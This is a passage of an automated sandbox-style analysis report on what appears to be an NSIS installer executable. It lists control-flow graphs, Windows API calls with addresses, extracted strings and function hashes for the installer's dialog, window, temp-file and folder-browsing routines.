318->322 323 403aa0-403aa5 319->323 324 403a94-403a9a 319->324 322->307 327 403adb-403aee SendMessageA 323->327 329 403aa7-403aad 323->329 324->327 328 403a9c-403a9e 324->328 327->307 328->322 332 403ac4-403acd call 40140b 329->332 333 403aaf-403ab5 call 40140b 329->333 332->307 342 403acf-403ad9 332->342 340 403abb 333->340 340->322 342->340 344->345 348 403c9a-403c9b 345->348 349 403c9d 345->349 350 403c9f-403ccd GetSystemMenu EnableMenuItem SendMessageA 348->350 349->350 351 403ce2 350->351 352 403ccf-403ce0 SendMessageA 350->352 353 403ce8-403d21 call 403ebc call 405b77 lstrlenA call 405b99 SetWindowTextA call 401389 351->353 352->353 353->296 362 403d27-403d29 353->362 362->296 363 403d2f-403d33 362->363 364 403d52-403d66 DestroyWindow 363->364 365 403d35-403d3b 363->365 364->298 367 403d6c-403d99 CreateDialogParamA 364->367 365->295 366 403d41-403d47 365->366 366->296 368 403d4d 366->368 367->298 369 403d9f-403df6 call 403e87 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 367->369 368->295 369->295 374 403df8-403e10 ShowWindow call 403ed3 369->374 374->298
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                      • ShowWindow.USER32(?), ref: 00403A0D
                                      • DestroyWindow.USER32 ref: 00403A21
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                      • GetDlgItem.USER32(?,?), ref: 00403A5E
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                      • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                      • SendMessageA.USER32(0000040F,00000000,00000001), ref: 00403B9C
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                      • ShowWindow.USER32(00000000,?), ref: 00403C63
                                      • EnableWindow.USER32(?,?), ref: 00403C75
                                      • EnableWindow.USER32(?,?), ref: 00403C90
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                      • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                      • lstrlenA.KERNEL32(0079ECF8,?,0079ECF8,007A1F00), ref: 00403D01
                                      • SetWindowTextA.USER32(?,0079ECF8), ref: 00403D10
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                      • String ID:
                                      • API String ID: 184305955-0
                                      • Opcode ID: d971db1fb676f9121a2777190888625fc0312326e765dd8249487f5c43209863
                                      • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                      • Opcode Fuzzy Hash: d971db1fb676f9121a2777190888625fc0312326e765dd8249487f5c43209863
                                      • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 377 403622-40363a call 405ea2 380 40363c-40364c call 405ad5 377->380 381 40364e-40367f call 405a5e 377->381 389 4036a2-4036cb call 4038e7 call 405712 380->389 385 403681-403692 call 405a5e 381->385 386 403697-40369d lstrcatA 381->386 385->386 386->389 395 4036d1-4036d6 389->395 396 403752-40375a call 405712 389->396 395->396 397 4036d8-4036fc call 405a5e 395->397 402 403768-40378d LoadImageA 396->402 403 40375c-403763 call 405b99 396->403 397->396 407 4036fe-403700 397->407 405 40380e-403816 call 40140b 402->405 406 40378f-4037bf RegisterClassA 402->406 403->402 420 403820-40382b call 4038e7 405->420 421 403818-40381b 405->421 408 4037c5-403809 SystemParametersInfoA CreateWindowExA 406->408 409 4038dd 406->409 411 403711-40371d lstrlenA 407->411 412 403702-40370f call 40564f 407->412 408->405 417 4038df-4038e6 409->417 414 403745-40374d call 405624 call 405b77 411->414 415 40371f-40372d lstrcmpiA 411->415 412->411 414->396 415->414 419 40372f-403739 GetFileAttributesA 415->419 423 40373b-40373d 419->423 424 40373f-403740 call 40566b 419->424 430 403831-40384e ShowWindow LoadLibraryA 420->430 431 4038b4-4038bc call 404f56 420->431 421->417 423->414 423->424 424->414 433 403850-403855 LoadLibraryA 430->433 434 403857-403869 GetClassInfoA 430->434 439 4038d6-4038d8 call 40140b 431->439 440 4038be-4038c4 431->440 433->434 436 403881-4038b2 DialogBoxParamA call 40140b call 403572 434->436 437 40386b-40387b GetClassInfoA RegisterClassA 434->437 436->417 437->436 439->409 440->421 442 4038ca-4038d1 call 40140b 440->442 442->421
                                      APIs
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • lstrcatA.KERNEL32(007A9000,0079ECF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ECF8,00000000,00000006,007A9400,75EE3410), ref: 0040369D
                                      • lstrlenA.KERNEL32(007A16A0,007A8400,?,?,007A16A0,00000000,007A8400,007A9000,0079ECF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ECF8,00000000,00000006,007A9400), ref: 00403712
                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                      • GetFileAttributesA.KERNEL32(007A16A0), ref: 00403730
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007A8400), ref: 00403779
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                      • ShowWindow.USER32(00000005), ref: 00403839
                                      • LoadLibraryA.KERNEL32(RichEd20), ref: 0040384A
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                      • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                      • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 914957316-2904746566
                                      • Opcode ID: fcf350a16533a8f7f48c774a1ae8809bdd7b9640d83f0523be5dbe97f1948a0b
                                      • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                      • Opcode Fuzzy Hash: fcf350a16533a8f7f48c774a1ae8809bdd7b9640d83f0523be5dbe97f1948a0b
                                      • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 403fd0-403fe0 449 4040f2-404105 448->449 450 403fe6-403fee 448->450 451 404161-404165 449->451 452 404107-404110 449->452 453 403ff0-403fff 450->453 454 404001-404099 call 403e87 * 2 CheckDlgButton call 403ea9 GetDlgItem call 403ebc SendMessageA 450->454 455 404235-40423c 451->455 456 40416b-40417f GetDlgItem 451->456 457 404244 452->457 458 404116-40411e 452->458 453->454 486 4040a4-4040ed SendMessageA * 2 lstrlenA SendMessageA * 2 454->486 487 40409b-40409e GetSysColor 454->487 455->457 463 40423e 455->463 460 404181-404188 456->460 461 4041f3-4041fa 456->461 464 404247-40424e call 403eee 457->464 458->457 462 404124-404130 458->462 460->461 466 40418a-4041a5 460->466 461->464 467 4041fc-404203 461->467 462->457 468 404136-40415c GetDlgItem SendMessageA call 403ea9 call 40425a 462->468 463->457 471 404253-404257 464->471 466->461 473 4041a7-4041f0 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 466->473 467->464 474 404205-404209 467->474 468->451 473->461 477 40420b-40421a SendMessageA 474->477 478 40421c-404220 474->478 477->478 481 404230-404233 478->481 482 404222-40422e SendMessageA 478->482 481->471 482->481 486->471 487->486
                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040405B
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 0040406F
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040408D
                                      • GetSysColor.USER32(?), ref: 0040409E
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040AD
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040BC
                                      • lstrlenA.KERNEL32(?), ref: 004040BF
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CE
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E3
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404145
                                      • SendMessageA.USER32(00000000), ref: 00404148
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404173
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B3
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004041C2
                                      • SetCursor.USER32(00000000), ref: 004041CB
                                      • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041DE
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004041EB
                                      • SetCursor.USER32(00000000), ref: 004041EE
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421A
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: N$open
                                      • API String ID: 3615053054-904208323
                                      • Opcode ID: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction ID: 031dbeac94855a04ab7bc056baf49b9f62a127ba2e136bb98bc4968a945489ce
                                      • Opcode Fuzzy Hash: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction Fuzzy Hash: DF61B971A40209BFEB109F60CC45F6A3B69FB84755F10816AFB047B2D1C7B8A951CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 488 4031b1-4031b5 488->488 489 4031b7-403264 call 40564f 488->489 494 403266 489->494 495 403267-40326b 489->495 494->495 496 403271-403305 GetTempPathA call 4030bb DeleteFileA call 402c33 495->496 497 4031ac-4031af 495->497 504 40330a-403310 496->504 505 403305 call 402c33 496->505 497->489 506 4033a4-4033b3 call 403548 OleUninitialize 504->506 507 403316-40331c 504->507 505->504 516 4033b9-4033c9 call 4053a8 ExitProcess 506->516 517 4034ad-4034b3 506->517 508 403394-4033a0 call 403622 507->508 509 40331e-403329 call 40564f 507->509 508->506 520 40332b-403354 509->520 521 40335f-403369 509->521 518 403530-403538 517->518 519 4034b5-4034d2 call 405ea2 * 3 517->519 524 40353a 518->524 525 40353e-403542 ExitProcess 518->525 550 4034d4-4034d6 519->550 551 40351c-403527 ExitWindowsEx 519->551 526 403356-403358 520->526 527 40336b-403378 call 405712 521->527 528 4033cf-4033e9 lstrcatA lstrcmpiA 521->528 524->525 526->521 531 40335a-40335d 526->531 527->506 540 40337a-403390 call 405b77 * 2 527->540 528->506 533 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 528->533 531->521 531->526 536 403402-403408 call 405b77 533->536 537 40340d-403435 call 405b77 533->537 536->537 546 40343b-403457 call 405b99 DeleteFileA 537->546 540->508 556 403498-40349f 546->556 557 403459-403469 CopyFileA 546->557 550->551 555 4034d8-4034da 550->555 551->518 554 403529-40352b call 40140b 551->554 554->518 555->551 559 4034dc-4034ee GetCurrentProcess 555->559 556->546 560 4034a1-4034a8 call 405a2b 556->560 557->556 561 40346b-40348b call 405a2b call 405b99 call 405347 557->561 559->551 565 4034f0-403512 559->565 560->506 561->556 573 40348d-403494 CloseHandle 561->573 565->551 573->556
                                      APIs
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(007A9400,\Temp), ref: 004032B2
                                      • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(007A9400,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,007A9400), ref: 004032E7
                                      • DeleteFileA.KERNEL32(007A9000), ref: 004032FB
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(007A9400,~nsu.tmp,?,?,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?,?,?,?,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(007A9C00,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,?,?,?,?,?), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: DirectoryExitFileProcesslstrcat$CurrentDeleteEnvironmentPathTempVariableWindows$CloseCopyCreateHandleUninitializelstrcmpilstrcpyn
                                      • String ID: $"$Error launching installer$Low$TEMP$TMP$\Temp$tvSU*#
                                      • API String ID: 5229609-2506149738
                                      • Opcode ID: 6a086e958b52bcf3b227f1b0a813edfeaa15eb1004a87bd095f96dbeb3b99093
                                      • Instruction ID: 143e6c1386cc77476d4f0e3e613a74925a80f8b86bd32943e9bd82241226e28c
                                      • Opcode Fuzzy Hash: 6a086e958b52bcf3b227f1b0a813edfeaa15eb1004a87bd095f96dbeb3b99093
                                      • Instruction Fuzzy Hash: EC510A30A0869259E7256F355C5DA3B7FE99B82307F0844BFE092762E3C67C4A05CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      • lstrcpyA.KERNEL32(007A0A88,NUL,00000000,00000000,?,?,?,00405A53,?,?,00000001,0040169A,00000000,00000000,00000000), ref: 004058AD
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,?,00405A53,?,?,00000001,0040169A,00000000,00000000,00000000), ref: 004058D1
                                      • GetShortPathNameA.KERNEL32(?,007A0A88,00000400), ref: 004058DA
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(0040599C,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                      • wsprintfA.USER32 ref: 00405915
                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?), ref: 00405950
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                      • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNEL32(00000003,00402C73,007A9C00,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 3756836283-4148678300
                                      • Opcode ID: 3dc5f7bb7184485a7b87fb4c129ebc8997b7fd1a3a4ee1b2d00c5489aec53c8d
                                      • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                      • Opcode Fuzzy Hash: 3dc5f7bb7184485a7b87fb4c129ebc8997b7fd1a3a4ee1b2d00c5489aec53c8d
                                      • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                      • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404314
                                      • SetWindowTextA.USER32(00000000,?), ref: 0040433E
                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043EF
                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FA
                                      • lstrcmpiA.KERNEL32(007A16A0,0079ECF8), ref: 0040442C
                                      • lstrcatA.KERNEL32(?,007A16A0), ref: 00404438
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444A
                                        • Part of subcall function 0040538C: GetDlgItemTextA.USER32(?,?,00000400,00404481), ref: 0040539F
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E5C
                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 00404505
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404520
                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A
                                      • API String ID: 2246997448-3554254475
                                      • Opcode ID: 9395c303e37b59eae5547e4d4be03b44725026b6b580d2a1fc6fc9bc52966496
                                      • Instruction ID: 03cdc0df629eda19bc81850558ffdd0616f3ff49271ebeceec1b5cb03d6b2ac4
                                      • Opcode Fuzzy Hash: 9395c303e37b59eae5547e4d4be03b44725026b6b580d2a1fc6fc9bc52966496
                                      • Instruction Fuzzy Hash: DB9192B1900208BBDB11AFA1CC81AAF77B8EF85305F14447BFB01B62D1D77C9A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      • GetVersion.KERNEL32(?,0079E4D8,00000000,00404EBC,0079E4D8,?), ref: 00405C4A
                                      • GetSystemDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CC5
                                      • GetWindowsDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CD8
                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D14
                                      • SHGetPathFromIDListA.SHELL32(?,007A16A0), ref: 00405D22
                                      • CoTaskMemFree.OLE32(?), ref: 00405D2D
                                      • lstrcatA.KERNEL32(007A16A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                      • lstrlenA.KERNEL32(007A16A0,?,0079E4D8,00000000,00404EBC,0079E4D8,?), ref: 00405DA1
                                      Strings
                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D49
                                      • ., xrefs: 00405C60
                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C94
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: .$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 900638850-3562769014
                                      • Opcode ID: eaa8d679cdde7ec1b846b7d20550e8a9090a2d3d3f7a51f3022e8c133c3e6eb0
                                      • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                      • Opcode Fuzzy Hash: eaa8d679cdde7ec1b846b7d20550e8a9090a2d3d3f7a51f3022e8c133c3e6eb0
                                      • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      • #17.COMCTL32 ref: 00403110
                                      • SetErrorMode.KERNEL32(00008001), ref: 0040311B
                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                      • GetModuleHandleA.KERNEL32(00000000,007A8000,00000000), ref: 00403172
                                      • CharNextA.USER32(00000000,007A8000,00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
